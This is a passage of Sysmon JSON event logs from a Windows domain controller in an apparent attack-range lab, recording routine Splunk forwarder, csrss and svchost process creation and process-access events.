Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list replication_port --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-01C9-5F25-0000-0010A4E50300}\r\nParentProcessId: 3824\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list replication_port --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.570","ProcessGuid":"{A837DB8D-01C9-5F25-0000-00105FE60300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list replication_port --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-01C9-5F25-0000-0010A4E50300}","ParentProcessId":"3824","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list replication_port --no-log","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2033,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.562\r\nSourceProcessGUID: {A837DB8D-01C9-5F25-0000-0010A4E50300}\r\nSourceProcessId: 3824\r\nSourceThreadId: 3816\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {A837DB8D-01C9-5F25-0000-00105FE60300}\r\nTargetProcessId: 868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.562","SourceProcessGUID":"{A837DB8D-01C9-5F25-0000-0010A4E50300}","SourceProcessId":"3824","SourceThreadId":"3816","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{A837DB8D-01C9-5F25-0000-00105FE60300}","TargetProcessId":"868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2034,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.562\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C9-5F25-0000-00105FE60300}\r\nTargetProcessId: 868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.562","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C9-5F25-0000-00105FE60300}","TargetProcessId":"868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2035,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.562\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.562","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2036,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.562\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.562","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2037,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.562\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.562","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2038,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.562\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.562","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2039,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.562\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.562","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2040,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.562\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.562","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
